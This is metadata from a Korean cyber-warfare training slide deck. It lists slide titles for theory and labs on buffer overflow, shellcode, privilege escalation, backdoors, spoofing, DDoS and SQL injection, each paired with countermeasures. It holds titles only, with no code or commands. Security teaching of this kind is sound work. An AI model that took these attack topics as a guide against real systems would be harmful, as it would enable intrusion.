      <vt:lpstr>/Theory/T14   자료의 표현 – ASCII 코드</vt:lpstr>
      <vt:lpstr>/Theory/T14   자료의 표현 – 파일 헤더</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   퀴즈 - steganography</vt:lpstr>
      <vt:lpstr>/Theory/T14   퀴즈 - Steganography</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제란?</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 - Shell</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Kernel 의 기능</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Process Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Process Information </vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Process Information </vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Scheduling Method</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Process Management </vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Kernel 의 기능</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Memory Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Memory Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Memory Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Memory Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Memory Management</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T15   운영체제 – Kernel 의 기능</vt:lpstr>
      <vt:lpstr>/Theory/T15   File Management</vt:lpstr>
      <vt:lpstr>/Theory/T15   Linux shell</vt:lpstr>
      <vt:lpstr>/Theory/T15   Linux… 왜 쓸까?</vt:lpstr>
      <vt:lpstr>/Theory/T16   네트워크</vt:lpstr>
      <vt:lpstr>/Theory/T16   IPconfig</vt:lpstr>
      <vt:lpstr>/Theory/T16   IP 클래스</vt:lpstr>
      <vt:lpstr>/Theory/T16   서브넷팅</vt:lpstr>
      <vt:lpstr>/Theory/T16   네트워크 데모</vt:lpstr>
      <vt:lpstr>/Theory/T16   ARP 테이블</vt:lpstr>
      <vt:lpstr>/Theory/T16   ARP 테이블</vt:lpstr>
      <vt:lpstr>/Theory/T16   네트워크 구조 추적</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   국방사이버보안_기말과제</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T18   gdb 사용법</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 &amp; 메모리 구조</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T19   어셈블리어 – 범용 레지스터</vt:lpstr>
      <vt:lpstr>/Theory/T26   SQL 인젝션(injection)</vt:lpstr>
      <vt:lpstr>/Theory/T26   SQL 인젝션(injection)</vt:lpstr>
      <vt:lpstr>/Theory/T26   SQL 인젝션(injection)</vt:lpstr>
      <vt:lpstr>/Theory/T26   SQL 인젝션(injection)</vt:lpstr>
      <vt:lpstr>/Theory/T26   SQL 인젝션(injection)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/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Training  실습</vt:lpstr>
      <vt:lpstr>/Training/Unit  단위과제</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys  시스템 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/1  1. 파일 접근 권한 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/2  2. 시스템 로그 점검</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/3  3. R-명령어 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/4  4. 계정 원격 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/5  5. 계정 우회 접속 탐지</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/6  6. 파일 접근 권한 설정 (Windows)</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/7  7. FTP 서비스 설정</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/8  8. Buffer Overflow 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/9  9. BOF - 쉘코드 실행 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF - 힙</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/10  10. BOF – 힙 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/11  11. Format String 공격 및 방어</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/Training/Unit/Sys/11  11. Format String 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/12  12. 권한상승 공격 및 방어- 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/13  13. 백도어 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Sys/14  14. 비인가 접근 공격 및 방어 -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net  네트워크 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/0  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/1  1. NIS(+) 서비스 제한</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/6  6. IP 접근 통제</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/Training/Unit/Net/9  9. ARP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/9  9. ARP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/11  11. DNS Spoofing</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/Training/Unit/Net/11  11. DNS Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/14  14. DDOS – DNS Amplification</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/14  14. DDOS – DNS Amplification</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/15  15. DDOS - Slowloris</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/15  15. DDOS - Slowloris</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  웹 문제 리스트</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web  0. 실습 구성도</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/1  1. SQL Injection 공격/방어</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/1  1. SQL Injection 공격/방어 - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/2  2. 취약점 직접 객체 참조</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/2  2. 취약점 직접 객체 참조 - 대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Web/3  2. 취약점 직접 객체 참조</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Cipher/7  현대암호 실습 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Training/Cipher/7 암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ  해커스쿨 FTZ</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/1   Level1</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/2   Level2</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/3   Level3</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/4   Level4</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/5   Level5</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/6   Level6</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/7   Level7</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/FTZ/8   Level8</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/WHK  Webhacking.kr</vt:lpstr>
      <vt:lpstr>/Training/WHK/2   old-02</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Appendix  부록</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 시연</vt:lpstr>
      <vt:lpstr>/Appendix  해킹 관련 영상</vt:lpstr>
      <vt:lpstr>/Appendix   공부 사이트</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사이버전실습</dc:title>
  <dc:creator>arizona95</dc:creator>
  <cp:lastModifiedBy>Author</cp:lastModifiedBy>
  <cp:revision>796</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-28T23:51:49Z</dcterms:modified>
</cp:coreProperties>
</file>